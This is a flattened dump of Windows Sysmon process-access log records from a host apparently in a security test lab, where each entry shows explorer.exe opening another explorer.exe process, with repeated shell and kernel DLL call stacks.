16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 